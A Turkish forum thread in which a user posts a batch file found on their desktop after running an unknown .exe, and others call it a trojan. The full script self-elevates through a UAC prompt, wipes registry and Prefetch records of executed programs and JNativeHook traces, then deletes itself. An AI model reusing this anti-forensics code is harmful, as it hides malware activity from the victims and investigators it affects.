Çözüldü Masaüstünde bir .bat dosyası

Bu konu çözüldü olarak işaretlenmiştir. Çözülmediğini düşünüyorsanız konuyu rapor edebilirsiniz.
Katılım
7 Nisan 2018
Mesajlar
1.491
Makaleler
1
Çözümler
13
Yer
Alanya, Antalya
Kod:
@echo off

>nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system"
if '%errorlevel%' NEQ '0' (
    goto UACPrompt
) else ( goto gotAdmin )
:UACPrompt
    if exist "%temp%\getadmin.vbs" del "%temp%\getadmin.vbs"
    echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs"
    echo UAC.ShellExecute "%~s0", "", "", "runas", 1 >> "%temp%\getadmin.vbs"
    "%temp%\getadmin.vbs"
    exit /b
:gotAdmin
    if exist "%temp%\getadmin.vbs" del "%temp%\getadmin.vbs"
    pushd "%CD%"
    CD /D "%~dp0"

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\AppCompatCache\AppCompatCache" /f
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCache\AppCompatCache" /f
reg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store" /f
reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU" /f
reg delete "HKEY_CURRENT_USER\SOFTWARE\7-Zip\FM" /f

cd C:\Users\%USERNAME%\AppData\Local\Temp
del /s /f *JNativeHook*
for /f %%i in ('dir /a:d /s /b *jna*') do rd /s /q %%i
cd C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Recent
del /s /f *lolxd*

cd C:\Windows\Prefetch\
del /s /f *REG*
del /s /f *CMD*
del /s /f *CACLS*
del /s /f *WSCRIPT*
for /F %%a in ('dir /B /O-D /A-D C:\Windows\Prefetch\java*') do (
  del /s /f "C:\Windows\Prefetch\%%a"
  goto :end
)

:end
del "%~f0"

Arkadaşlar masa üstümde "sd.bat" diye bir şey buldum. Dosyayı düzenle dedim ve bunları buldum. Bu kodlar ney?
-bugün ne olduğunu bilmediğim .exe dosyası açtım.-
 
Hocam trojan çıktı bundan.
 

Dosya Ekleri

  • Ekran Alıntısı.PNG
    Ekran Alıntısı.PNG
    3,4 KB · Görüntüleme: 49
Hocam trojan çıktı bundan.
Tepkim ektedir.
Bu içeriği görüntülemek için üçüncü taraf çerezlerini yerleştirmek için izninize ihtiyacımız olacak.
Daha detaylı bilgi için, çerezler sayfamıza bakınız.

Malware ile tamamen bir tarama yapayım.
sss.JPG

"nE?"
 

Geri
Yukarı